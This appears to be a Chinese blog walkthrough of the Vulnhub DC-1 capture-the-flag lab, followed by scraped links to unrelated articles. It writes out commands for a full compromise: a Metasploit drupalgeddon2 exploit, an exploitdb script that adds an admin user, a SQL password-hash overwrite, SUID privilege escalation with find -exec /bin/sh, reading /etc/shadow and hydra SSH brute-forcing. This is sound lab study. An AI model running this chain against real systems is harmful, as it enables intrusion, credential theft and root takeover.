冠霖L
冠霖L

Vulnhub靶机实战——DC-1

靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip

描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag

 

环境:Vmware 15 Pro虚拟机软件

          DC-1靶机IP地址:192.168.220.130

          Kali的IP地址:192.168.220.131

 

本次DC-1靶机渗透测试,靶机与kali都以NAT模式连接网络,查看kali的IP地址:

ip addr

Vulnhub靶机实战——DC-1_第1张图片

使用nmap扫描工具,扫描192.168.220.0/24网段,发现存活主机,断定192.168.220.130是DC-1靶机的IP地址

nmap -sP 192.168.220.0/24 -oN nmap220.sP

Vulnhub靶机实战——DC-1_第2张图片

nmap扫描靶机开放的端口号,扫描范围0-65535,发现开放22(ssh)、80(http)、111和57744共四个端口

nmap -A 192.168.220.130 -p- -oN nmap130.A

Vulnhub靶机实战——DC-1_第3张图片

浏览器输入DC-1靶机IP地址访问网站:http://192.168.220.130

发现网站是用Drupal(CMS+PHP)搭建的,使用的是Drupal 7版本

Vulnhub靶机实战——DC-1_第4张图片

使用msfconsole查找可以针对Drupal的模块

msf > search drupal    #查找可用于Drupal的模块

Vulnhub靶机实战——DC-1_第5张图片

尝试使用查询出来的模块,从一个开始尝试使用,发现只有三、五两个模块可以针对Drupal 使用,并能够成功反弹shell,其他模块皆失败

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.220.130
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

Vulnhub靶机实战——DC-1_第6张图片

反弹shell后,使用ls命令可以查看在当前/var/www目录下存在flag1.txt

Vulnhub靶机实战——DC-1_第7张图片

查看flag1.txt文本文件

cat flag1.txt

Flag1:

Every good CMS needs a config file - and so do you.

每一个好的CMS都需要一个配置文件-你也是。

查找后发现CMS的配置文件是网站根目录下的/site/defaultx下的setting.php文件

meterpreter > cd sites/default
meterpreter > cat settings.php

查看setting.php配置文件,发现flag2及网站数据库及登录用户名和密码,且flag2提示不要使用字典暴力破解密码,应使用其他方法,通过数据库应该是另外一种方法

Flag2:

Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)。你能用这些证件做什么?

数据库信息:

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

'host' => 'localhost',

Vulnhub靶机实战——DC-1_第8张图片

使用mysql命令登录,发现MySQL命令无效

meterpreter > mysql -udbuser -pR0ck3t

输入shell,切换外壳,再次登录mysql发现终端不能正常回显信息

meterpreter > shell
mysql -udbuser -pR0ck3t

Vulnhub靶机实战——DC-1_第9张图片

再次进入shell下,输入python命令,发现靶机已安装python 2.7.3,通过pty.spawn()获得交互式shell

meterpreter > shell
python -V
python -c 'import pty; pty.spawn("/bin/bash")'

Vulnhub靶机实战——DC-1_第10张图片

使用上面找到mysql登录用户名和密码登录mysql数据库:

mysql -udbuser -pR0ck3t    #登录MySQL数据库
mysql> show databases;    #查看数据库

Vulnhub靶机实战——DC-1_第11张图片

mysql> use drupaldb;     #使用drupaldb数据库
mysql> show tables;       #查看数据库内的表

Vulnhub靶机实战——DC-1_第12张图片

找到users表,断定和用户密码有关

mysql> select * from users;   #查看users表内容
name:admin  pass:$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

找到可用于登录的用户admin和密码密文

Vulnhub靶机实战——DC-1_第13张图片

方法一:

在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更直接

查看Drupal版本,确定Drupal版本为7.24

cat /var/www/includes/bootstrap.inc  |  grep VERSION

msf > searchsploit drupal   #查找针对Drupal的攻击脚本

攻击脚本适用于7.31以下,所以适合7.24版本

Vulnhub靶机实战——DC-1_第14张图片

利用drupal7.0版本漏洞增加有admin权限的用户:admin1/admin1

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.220.130 -u admin1 -p admin1   

Vulnhub靶机实战——DC-1_第15张图片

Vulnhub靶机实战——DC-1_第16张图片

查看users表,添加admin1成功

Vulnhub靶机实战——DC-1_第17张图片

使用新添加的用户admin1/admin1登录网站,在content模块下,找到flag3

方法二:

使用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下

使用加密脚本加密新密码123456,生成加密密文

./scripts/password-hash.sh 123456
password: 123456             
hash: $S$DbpIRKV5QXrJK4Gbhb.LDFoTjqoYNKAOB.DY3V1BL.JMbMkZANhY

修改admin用户的密码,更新为新密码:123456

update  drupaldb.users  set pass="$S$DbpIRKV5QXrJK4Gbhb.LDFoTjqoYNKAOB.DY3V1BL.JMbMkZANhY" where uid=1;

 

使用用户admin/123456登录网站,在content模块下,找到flag3

Vulnhub靶机实战——DC-1_第18张图片

Flag3:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

Vulnhub靶机实战——DC-1_第19张图片

Flag3提示词有perms、find、-exec、shadow共四个特殊提示词

应该要查看shadow文件,并使用find命令提权

使用find命令查找有特殊权限suid的命令

find / -perm -4000

Vulnhub靶机实战——DC-1_第20张图片

使用find命令提权

find ./ aaa -exec '/bin/sh' \;

查看/etc/shadow 文件,发现flag4用户,并且flag4用户可以登录并且有密码,所以存在flag4的家目录

cat /etc/shadow

Vulnhub靶机实战——DC-1_第21张图片

flag4用户密码可以使用ssh登录进行爆破,如下:

注:爆破flag4用户密码可以省略,可以在root提权后直接进入flag4家目录

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz   #下载John密码包
tar -xvf john-1.8.0.tar.gz  #解压缩
cd john-1.8.0/ src    #进入源码目录下
uname -a  #查看当前系统版本
make linux-x86-64   #编译并指定当前的Linux系统版本

使用hydra+John密码包对flag4的密码进行爆破,爆破密码为:flag4/orange

hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.220.130 -f -vV -o hydraflag4.ssh
login: flag4   password: orange

Vulnhub靶机实战——DC-1_第22张图片

使用flag4用户可以通过ssh登录系统

ssh [email protected]
密码:orange

Vulnhub靶机实战——DC-1_第23张图片

进入flag4用户的家目录/home/flag4,找到flag4.txt文本文件,找到flag4

cd /home/flag4
cat flag4.txt

Vulnhub靶机实战——DC-1_第24张图片

Flag4:

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

你能用同样的方法来查找或访问根目录中的标志吗?

可能。但也许不是那么容易。或许是这样?

 

在flag4中提示在root根目录下存在,进入到root家目录/root下找到thefinalflag.txt文本文件

cd /root
cat thefinalflag.txt

Vulnhub靶机实战——DC-1_第25张图片

thefinalflag:

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey

by contacting me via Twitter - @DCAU7

做得好!!!!!

希望你喜欢这个并学到了一些新的技能。

你可以让我知道你对这次小旅行的看法。

通过Twitter联系我-@dcau7

 

五个flag全部找到,并学习到使用msfconsole框架,及使用find命令找suid和提权

 

 

 

你可能感兴趣的:(靶机)

  • vulnhub靶机-DC2-Writeup 含日 靶机linux安全靶机渗透测试安全漏洞
    0x01部署靶机地址:https://www.vulnhub.com/entry/dc-2,311/DESCRIPTIONMuchlikeDC-1,DC-2isanotherpurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.AswiththeoriginalDC-1,i
  • VulnHub DC-1-DC-7靶机WP 蚁景网络安全 网络安全渗透测试
    VulnHubDC系列靶机:https://vulnhub.com/series/dc,199/#VulnHubDC-1nmap开路获取信息Nmapscanreportfor192.168.106.133Hostisup(0.00017slatency).Notshown:997closedportsPORTSTATESERVICE22/tcpopenssh80/tcpopenhttp111/tc
  • ubuntu16下搭建web服务器以及数据库 AI_Engine
    我的公众号:AIEngine(I是大写的i啦!!!)前几日有位关注本人公众号的朋友想咨询下如何0起步搭建web服务器并关联数据库,正巧之前也有人问过类似的问题,今天留下干货一篇,搭建的环境正好也可当做靶机使用。对于大神们可以绕道,不过哪里说的不对欢迎指教啊~首先呢,我们搭建一台ubuntu16.04的虚拟机(方便试验,真实情况当然是要有一台服务器了),然后安装openssh-server(open
  • 纪念第一次面试安服-靶机测试过程以及思路 寻址00000001 安服学习以及实战演练安全
    靶机测试过程以及思路解题思路:1查看web界面站点信息(寻找有价值信息)2查看站点源码信息(html\css\js)3遍历目录,访问可访问站点(发现登陆界面)4解码站点有用信息(图片、文本)5登陆界面dirb中进行路径爆破6抓包、更改request分析登陆界面7寻找web服务器漏洞、站点漏洞、数据库漏洞等漏洞信息,如git泄露8sql注入、文件包含等方式先使用错误的参数进行页面报错判断(使用’或者
  • BossPlayerCTF Y4y17 Vulnhub安全web安全网络网络安全学习
    靶场环境问题靶场下载之后,可能会出现扫描不到IP的情况,需要进行调整,参考:Vulnhub靶机检测不到IP地址_vulnhub靶机nmap扫不到-CSDN博客该靶机没有vim,需要使用vi命令去修改;改成当前网卡即可!信息收集#nmap-sn192.168.1.0/24-oNlive.nmapStartingNmap7.94(https://nmap.org)at2024-02-0409:31CS
  • HTB-CozyHosting Y4y17 HackTheBox网络安全安全学习web安全安全威胁分析
    目标靶机的IP地址为10.10.11.230,下面测试连接的稳定性!攻击机的IP地址为10.10.14.67!有一点点慢,应该是问题不大!信息收集#nmap-sT--min-rate10000-p-10.10.11.230-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1517:36CSTWarning:10.10.11.230giv
  • HTB-Analytics Y4y17 HackTheBox网络安全学习安全威胁分析web安全安全
    靶机的IP地址为10.10.11.233,攻击机的IP地址为10.10.16.30信息收集#nmap-sT--min-rate10000-p-10.10.11.233-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1914:50CSTWarning:10.10.11.233givinguponportbecauseretransmis
  • 【BUUCTF 加固题】Ezsql 速通 hacker-routing webCTF夺旗赛开发语言前端javascriptweb安全htmlphpCTF
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【Java】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、访问web网址二、ssh远程登录三、加固网站源代码前言靶机地址解释:第一行:目标机器WEB服
  • vulvhub-----Hacker-KID靶机 郑居中3.0 vulnhub靶机hacker-KIDweb安全python
    打靶详细教程1.网段探测2.端口服务扫描3.目录扫描4.收集信息burpsuite抓包5.dig命令6.XXE漏洞读取.bashrc文件7.SSTI漏洞8.提权1.查看python是否具备这个能力2.使用python执行exp.py脚本,如果提权成功,靶机则会开放5600端口1.网段探测┌──(root㉿kali)-[~]└─#arp-scan-lInterface:eth0,type:EN10M
  • 【靶机渗透】HACKME: 1 安全狐 靶机渗透安全
    【靶机渗透】HACKME:1本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME:10x01靶机介绍1.详情链接https://www.vulnhub.com/entry/hackme-1,330/发布日期2019年7月18日作者x4bx54难度初学者,简单2.描述'hackme'isabeginnerdifficultylevelbox.Thegoalistogainlimite
  • <网络安全>《35 网络攻防专业课<第一课 - 网络攻防准备>》 Ealser #网络安全web安全网络安全网络攻防
    1主要内容认识黑客认识端口常见术语与命令网络攻击流程VMWare虚拟环境靶机搭建2认识黑客2.1白帽、灰帽和黑帽黑客白帽黑客是指有能力破坏电脑安全但不具恶意目的黑客。灰帽黑客是指对于伦理和法律态度不明的黑客。黑帽黑客经常用于区别于一般(正面的)理性黑客,一个犯罪和黑客的合成词。2.2黑客、红客、蓝客和骇客黑客:Hacker,水平超高的电脑专家,尤其是程序设计人员,是一个统称。红客:维护国家利益,代
  • [GXYCTF2019]禁止套娃1 不会编程的崽的博客 不会编程的崽 web安全网络安全安全
    这个题重点在于无参数绕过首先来看一下这个界面查看源代码,目录文件扫描以及抓包都没什么有价值的信息。但是web题如果没有什么功能页面,一定有什么提示。若提示也没有,一般就泄露了文件或者源码等。这题就是源码泄露。使用GitHack。下载地址如下:https://github.com/lijiejie/GitHackpython2GitHack.pyhttp://你的靶机地址/.git打开index的源
  • 渗透测试实战-bulldog Rgylin 我的渗透之路安全web安全linux
    文章目录环境准备信息收集漏洞利用后期利用思路一后期利用总结环境准备kali当成攻击机bulldog靶机官网下载地址Vmware装入即可,成功后是显示这个样子kaliip是:192.168.240.128信息收集使用nmap扫一下靶机处于的网段情况使用nmap-sn只进行主机发现,不进行端口扫描nmap-Pn并进行端口扫描已知对方网段在192.168.240.中所以nmap扫一下即可漏洞利用可以看到
  • CFS三层靶机 0e1G7 渗透笔记服务器linux运维
    参考博客:CFS三层内网靶场渗透记录【详细指南】-FreeBuf网络安全行业门户CFS三层靶机搭建及其内网渗透【附靶场环境】|TeamsSixCFS三层网络环境靶场实战-PANDA墨森-博客园(cnblogs.com)CFS三层靶机实战--内网横向渗透-知乎(zhihu.com)CFS靶机实战演练-从外网杀进三层内网,横向渗透拿到Flag-阿里云开发者社区(aliyun.com)主机发现fscan
  • vulnhub-Momentum2 南冥~ sshphplinux
    vulnhub-Momentum2靶机首先先去下载靶机地址:https://download.vulnhub.com/momentum/Momentum2.ova下载完靶机,直接利用VMave导入打开一,信息收集首先确定自己的靶机为net模式,知道自己靶机所在网段然后利用kali进行IP扫描:nmap-sP192.168.229.0/24发现存活的IP,除去自己的IP发现靶机IP:192.168.
  • DC-4靶场实战详解 a310034188 DC安全linuxweb安全
    DC-4靶场实战详解环境安装DC-4下载地址:https://www.vulnhub.com/entry/dc-4,313/kali与DC-4网络配置设为一致,我这里都是用nat模式寻找FLAG信息收集1.寻找靶机ip我的kaliip为192.168.79.128不知道kaliip的可以直接ipadd查看在kali中使用nmap或者使用arp-scan方法一:arp-scan-l方法二:nmap-
  • Vulnhub靶机:DC4 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC4(10.0.2.57)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/二、信息收集使用nmap主机发现靶机ip:10.0.2.57使用nmap端口扫描发现靶机开放端口:22、80打开网站是一个登录页面,查看源码也没有发现隐藏信息使用
  • 渗透测试-靶机Bulldog2 鸡翅儿
    参考链接:https://www.anquanke.com/post/id/160755攻击机ip:192.168.60.230靶机ip:192.168.30.231图片.png端口扫描这里仍然使用nmapnmap-sV-p-192.168.60.231查看到只开放了一个80端口图片.png访问web页面,通过指纹识别工具查询到编程语使用的是Node.js,服务器Nginx图片.png端口探测后开
  • Vulnhub靶机:DC3 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC3(10.0.2.56)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/二、信息收集使用nmap主机发现靶机ip:10.0.2.56使用nmap端口扫描发现靶机开放端口:80打开网站发现是一个登录界面,查看源码未发现隐藏信息使用go
  • Vulnhub靶机:DC2 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC2(10.0.2.55)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/二、信息收集使用nmap主机发现靶机ip:10.0.2.55使用nmap端口扫描发现靶机开放端口:80、7744打开网站发现会自动跳转到域名dc-2,在/etc/
  • [VulnHub靶机渗透] Nyx hacker-routing web【精选】VulnHub渗透测试靶场练习平台前端开发语言CTF安全网络vulnhub渗透测试
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1、主机探测2、端口扫描3、漏洞扫描nikto漏洞扫描nmap漏洞扫描二、调试测
  • hackthebox-Oouch byc_404
    Oouch靶机的难度相比最近做完的两个hardmachineQuick跟Forwardslash而言有过之而无不及。甚至于感觉可能接近到Insane难度了。从web界面下手时遇到很多不稳定的问题,而之后从user提权到root更是出现玄学问题,一模一样的的payload头一天失败第二天就成了。但是总归学到了不少新知识,所以赶紧总结下。由于Oouch还是active状态,所以我会给文章上锁直到靶机退
  • Vulnhub靶机:hackable3 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hackable3(10.0.2.53)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hackable-iii,720/二、信息收集使用nmap主机发现靶机ip:10.0.2.53使用nmap端口扫描发现,靶机开放端口:22、80打开网站未发现可利用的功
  • Vulnhub靶机:DC1 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC1(10.0.2.54)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/二、信息收集使用nmap主机发现靶机ip:10.0.2.54使用nmap端口扫描发现靶机开放端口:22、80、111、3788480端口:打开网站发现该网站为Dr
  • Vulnhub靶机:hackableII huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hackableII(10.0.2.52)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/二、信息收集使用nmap主机发现靶机ip:10.0.2.52使用nmap端口扫描发现,靶机开放端口:21、22、8021端口:通过nm
  • Vulnhub靶机:hacksudo-ProximaCentauri huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-ProximaCentauri(10.0.2.51)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacksudo-proximacentauri,709/二、信息收集使用nmap主机发现靶机ip:10.0.2.51使用nmap端口扫描
  • redis未授权访问漏洞利用 渗透测试老鸟-九青 redis数据库缓存
    当redis服务(6379)端口对外开放且未作密码认证时,任意用户可未授权访问redis服务并操作获取其数据。攻击机:10.1.1.100kali目标靶机:10.1.1.200一、探测redis的未授权访问首先在攻击机上使用nmap对目标机进行扫描,探测开放的服务与端口。使用全端口扫描,探测存在的服务:nmap-p--sV10.1.1.200探测到靶机开放了多个端口,其中存在redis服务的637
  • 【Web】Redis未授权访问漏洞学习笔记 Z3r4y redisctfweb未授权访问web安全网络安全shellcode
    目录简介靶机配置Redis持久化Redis动态修改配置webshell反弹shellRedis写入反弹shell任务加固方案简介Redis(RemoteDictionaryServer远程字典服务器)是一个开源的内存数据库,也被称为数据结构服务器,它支持多种数据结构,如字符串、哈希表、列表、集合、有序集合等。Redis旨在提供一个高性能、持久化的key-value存储解决方案,并且具有丰富的功能和
  • DC-9靶机渗透详细流程 kitha. DC靶机系列渗透测试网络安全web安全web网络安全安全攻防
    信息收集:1.存活扫描:arp-scan-Ieth0-l发现靶机ip:192.168.10.132└─#arp-scan-Ieth0-l192.168.10.100:50:56:c0:00:08(Unknown)192.168.10.200:50:56:e5:b1:08(Unknown)192.168.10.132//靶机00:0c:29:a6:a5:cd(Unknown)192.168.10.2
  • buuctf [ACTF2020 新生赛]Exec1 又一片风 CTF_WPlinuxweb安全安全
    本题考查linux命令,越权查询知识点:ls查看当前目录下的所有目录和文件ls/查看根目录下的所有目录和文件cat以文本形式读取文件1.我们进入靶机地址,看到有这样一个ping地址2.首先我们ping一下本机,即127.0.0.1,发现可以正常ping到3.那么我们就可以进行双重操作,即命令1&&命令2:在进行命令1成功后进行命令2;我们猜想服务器用的是linux系统4.发现在根目录下存在flag
  • 桌面上有多个球在同时运动,怎么实现球之间不交叉,即碰撞? 换个号韩国红果果 html小球碰撞
    稍微想了一下,然后解决了很多bug,最后终于把它实现了。其实原理很简单。在每改变一个小球的x y坐标后,遍历整个在dom树中的其他小球,看一下它们与当前小球的距离是否小于球半径的两倍?若小于说明下一次绘制该小球(设为a)前要把他的方向变为原来相反方向(与a要碰撞的小球设为b),即假如当前小球的距离小于球半径的两倍的话,马上改变当前小球方向。那么下一次绘制也是先绘制b,再绘制a,由于a的方向已经改变
  • 《高性能HTML5》读后整理的Web性能优化内容 白糖_ html5
    读后感         先说说《高性能HTML5》这本书的读后感吧,个人觉得这本书前两章跟书的标题完全搭不上关系,或者说只能算是讲解了“高性能”这三个字,HTML5完全不见踪影。个人觉得作者应该首先把HTML5的大菜拿出来讲一讲,再去分析性能优化的内容,这样才会有吸引力。因为只是在线试读,没有机会看后面的内容,所以不胡乱评价了。  
  • [JShop]Spring MVC的RequestContextHolder使用误区 dinguangx jeeshop商城系统jshop电商系统
        在spring mvc中,为了随时都能取到当前请求的request对象,可以通过RequestContextHolder的静态方法getRequestAttributes()获取Request相关的变量,如request, response等。         在jshop中,对RequestContextHolder的
  • 算法之时间复杂度 周凡杨 java算法时间复杂度效率
          在 计算机科学 中, 算法 的时间复杂度是一个 函数 ,它定量描述了该算法的运行时间。这是一个关于代表算法输入值的 字符串 的长度的函数。时间复杂度常用 大O符号 表述,不包括这个函数的低阶项和首项系数。使用这种方式时,时间复杂度可被称为是 渐近 的,它考察当输入值大小趋近无穷时的情况。 这样用大写O()来体现算法时间复杂度的记法,
  • Java事务处理 g21121 java
    一、什么是Java事务 通常的观念认为,事务仅与数据库相关。 事务必须服从ISO/IEC所制定的ACID原则。ACID是原子性(atomicity)、一致性(consistency)、隔离性(isolation)和持久性(durability)的缩写。事务的原子性表示事务执行过程中的任何失败都将导致事务所做的任何修改失效。一致性表示当事务执行失败时,所有被该事务影响的数据都应该恢复到事务执行前的状
  • Linux awk命令详解 510888780 linux
    一.  AWK 说明   awk是一种编程语言,用于在linux/unix下对文本和数据进行处理。数据可以来自标准输入、一个或多个文件,或其它命令的输出。它支持用户自定义函数和动态正则表达式等先进功能,是linux/unix下的一个强大编程工具。它在命令行中使用,但更多是作为脚本来使用。    awk的处理文本和数据的方式:它逐行扫描文件,从第一行到
  • android permission 布衣凌宇 Permission
    <uses-permission android:name="android.permission.ACCESS_CHECKIN_PROPERTIES" ></uses-permission>允许读写访问"properties"表在checkin数据库中,改值可以修改上传 <uses-permission android:na
  • Oracle和谷歌Java Android官司将推迟 aijuans javaoracle
    北京时间 10 月 7 日,据国外媒体报道,Oracle 和谷歌之间一场等待已久的官司可能会推迟至 10 月 17 日以后进行,这场官司的内容是 Android 操作系统所谓的 Java 专利权之争。本案法官 William Alsup 称根据专利权专家 Florian Mueller 的预测,谷歌 Oracle 案很可能会被推迟。  该案中的第二波辩护被安排在 10 月 17 日出庭,从目前看来
  • linux shell 常用命令 antlove linuxshellcommand
    grep [options] [regex] [files] /var/root # grep -n "o" * hello.c:1:/* This C source can be compiled with:
  • Java解析XML配置数据库连接(DOM技术连接 SAX技术连接) 百合不是茶 sax技术Java解析xml文档dom技术XML配置数据库连接
        XML配置数据库文件的连接其实是个很简单的问题,为什么到现在才写出来主要是昨天在网上看了别人写的,然后一直陷入其中,最后发现不能自拔 所以今天决定自己完成 ,,,,现将代码与思路贴出来供大家一起学习   XML配置数据库的连接主要技术点的博客; JDBC编程 : JDBC连接数据库 DOM解析XML:  DOM解析XML文件 SA
  • underscore.js 学习(二) bijian1013 JavaScriptunderscore
            Array Functions 所有数组函数对参数对象一样适用。1.first   _.first(array, [n])   别名: head, take       返回array的第一个元素,设置了参数n,就
  • plSql介绍 bijian1013 oracle数据库plsql
    /* * PL/SQL 程序设计学习笔记 * 学习plSql介绍.pdf * 时间:2010-10-05 */ --创建DEPT表 create table DEPT ( DEPTNO NUMBER(10), DNAME NVARCHAR2(255), LOC NVARCHAR2(255) ) delete dept; select
  • 【Nginx一】Nginx安装与总体介绍 bit1129 nginx
    启动、停止、重新加载Nginx nginx 启动Nginx服务器,不需要任何参数u nginx -s stop 快速(强制)关系Nginx服务器 nginx -s quit 优雅的关闭Nginx服务器 nginx -s reload 重新加载Nginx服务器的配置文件 nginx -s reopen 重新打开Nginx日志文件  
  • spring mvc开发中浏览器兼容的奇怪问题 bitray jqueryAjaxspringMVC浏览器上传文件
        最近个人开发一个小的OA项目,属于复习阶段.使用的技术主要是spring mvc作为前端框架,mybatis作为数据库持久化技术.前台使用jquery和一些jquery的插件.     在开发到中间阶段时候发现自己好像忽略了一个小问题,整个项目一直在firefox下测试,没有在IE下测试,不确定是否会出现兼容问题.由于jquer
  • Lua的io库函数列表 ronin47 lua io
    1、io表调用方式:使用io表,io.open将返回指定文件的描述,并且所有的操作将围绕这个文件描述   io表同样提供三种预定义的文件描述io.stdin,io.stdout,io.stderr   2、文件句柄直接调用方式,即使用file:XXX()函数方式进行操作,其中file为io.open()返回的文件句柄   多数I/O函数调用失败时返回nil加错误信息,有些函数成功时返回nil
  • java-26-左旋转字符串 bylijinnan java
    public class LeftRotateString { /** * Q 26 左旋转字符串 * 题目:定义字符串的左旋转操作:把字符串前面的若干个字符移动到字符串的尾部。 * 如把字符串abcdef左旋转2位得到字符串cdefab。 * 请实现字符串左旋转的函数。要求时间对长度为n的字符串操作的复杂度为O(n),辅助内存为O(1)。 */ pu
  • 《vi中的替换艺术》-linux命令五分钟系列之十一 cfyme linux命令
    vi方面的内容不知道分类到哪里好,就放到《Linux命令五分钟系列》里吧! 今天编程,关于栈的一个小例子,其间我需要把”S.”替换为”S->”(替换不包括双引号)。 其实这个不难,不过我觉得应该总结一下vi里的替换技术了,以备以后查阅。   1 所有替换方案都要在冒号“:”状态下书写。 2 如果想将abc替换为xyz,那么就这样 :s/abc/xyz/ 不过要特别
  • [轨道与计算]新的并行计算架构 comsci 并行计算
         我在进行流程引擎循环反馈试验的过程中,发现一个有趣的事情。。。如果我们在流程图的每个节点中嵌入一个双向循环代码段,而整个流程中又充满着很多并行路由,每个并行路由中又包含着一些并行节点,那么当整个流程图开始循环反馈过程的时候,这个流程图的运行过程是否变成一个并行计算的架构呢?      
  • 重复执行某段代码 dai_lm android
    用handler就可以了 private Handler handler = new Handler(); private Runnable runnable = new Runnable() { public void run() { update(); handler.postDelayed(this, 5000); } }; 开始计时 h
  • Java实现堆栈(list实现) datageek 数据结构——堆栈
    public interface IStack<T> { //元素出栈,并返回出栈元素 public T pop(); //元素入栈 public void push(T element); //获取栈顶元素 public T peek(); //判断栈是否为空 public boolean isEmpty
  • 四大备份MySql数据库方法及可能遇到的问题 dcj3sjt126com DBbackup
    一:通过备份王等软件进行备份前台进不去? 用备份王等软件进行备份是大多老站长的选择,这种方法方便快捷,只要上传备份软件到空间一步步操作就可以,但是许多刚接触备份王软件的客用户来说还原后会出现一个问题:因为新老空间数据库用户名和密码不统一,网站文件打包过来后因没有修改连接文件,还原数据库是好了,可是前台会提示数据库连接错误,网站从而出现打不开的情况。 解决方法:学会修改网站配置文件,大多是由co
  • github做webhooks:[1]钩子触发是否成功测试 dcj3sjt126com githubgitwebhook
    转自: http://jingyan.baidu.com/article/5d6edee228c88899ebdeec47.html github和svn一样有钩子的功能,而且更加强大。例如我做的是最常见的push操作触发的钩子操作,则每次更新之后的钩子操作记录都会在github的控制板可以看到! 工具/原料 github 方法/步骤
  • ">的作用" target="_blank">JSP中的作用 蕃薯耀
    JSP中<base href="<%=basePath%>">的作用 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  • linux下SAMBA服务安装与配置 hanqunfeng linux
    局域网使用的文件共享服务。 一.安装包: rpm -qa | grep samba samba-3.6.9-151.el6.x86_64 samba-common-3.6.9-151.el6.x86_64 samba-winbind-3.6.9-151.el6.x86_64 samba-client-3.6.9-151.el6.x86_64 samba-winbind-clients
  • guava cache IXHONG cache
    缓存,在我们日常开发中是必不可少的一种解决性能问题的方法。简单的说,cache 就是为了提升系统性能而开辟的一块内存空间。   缓存的主要作用是暂时在内存中保存业务系统的数据处理结果,并且等待下次访问使用。在日常开发的很多场合,由于受限于硬盘IO的性能或者我们自身业务系统的数据处理和获取可能非常费时,当我们发现我们的系统这个数据请求量很大的时候,频繁的IO和频繁的逻辑处理会导致硬盘和CPU资源的
  • Query的开始--全局变量,noconflict和兼容各种js的初始化方法 kvhur JavaScriptjquerycss
    这个是整个jQuery代码的开始,里面包含了对不同环境的js进行的处理,例如普通环境,Nodejs,和requiredJs的处理方法。 还有jQuery生成$, jQuery全局变量的代码和noConflict代码详解  完整资源: http://www.gbtags.com/gb/share/5640.htm jQuery 源码:   (
  • 美国人的福利和中国人的储蓄 nannan408
       今天看了篇文章,震动很大,说的是美国的福利。    美国医院的无偿入院真的是个好措施。小小的改善,对于社会是大大的信心。小孩,税费等,政府不收反补,真的体现了人文主义。    美国这么高的社会保障会不会使人变懒?答案是否定的。正因为政府解决了后顾之忧,人们才得以倾尽精力去做一些有创造力,更造福社会的事情,这竟成了美国社会思想、人
  • N阶行列式计算(JAVA) qiuwanchi N阶行列式计算
    package gaodai; import java.util.List; /** * N阶行列式计算 * @author 邱万迟 * */ public class DeterminantCalculation { public DeterminantCalculation(List<List<Double>> determina
  • C语言算法之打渔晒网问题 qiufeihu c算法
    如果一个渔夫从2011年1月1日开始每三天打一次渔,两天晒一次网,编程实现当输入2011年1月1日以后任意一天,输出该渔夫是在打渔还是在晒网。 代码如下:   #include <stdio.h> int leap(int a) /*自定义函数leap()用来指定输入的年份是否为闰年*/ { if((a%4 == 0 && a%100 != 0
  • XML中DOCTYPE字段的解析 wyzuomumu xml
    DTD声明始终以!DOCTYPE开头,空一格后跟着文档根元素的名称,如果是内部DTD,则再空一格出现[],在中括号中是文档类型定义的内容. 而对于外部DTD,则又分为私有DTD与公共DTD,私有DTD使用SYSTEM表示,接着是外部DTD的URL. 而公共DTD则使用PUBLIC,接着是DTD公共名称,接着是DTD的URL.   私有DTD <!DOCTYPErootSYST
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他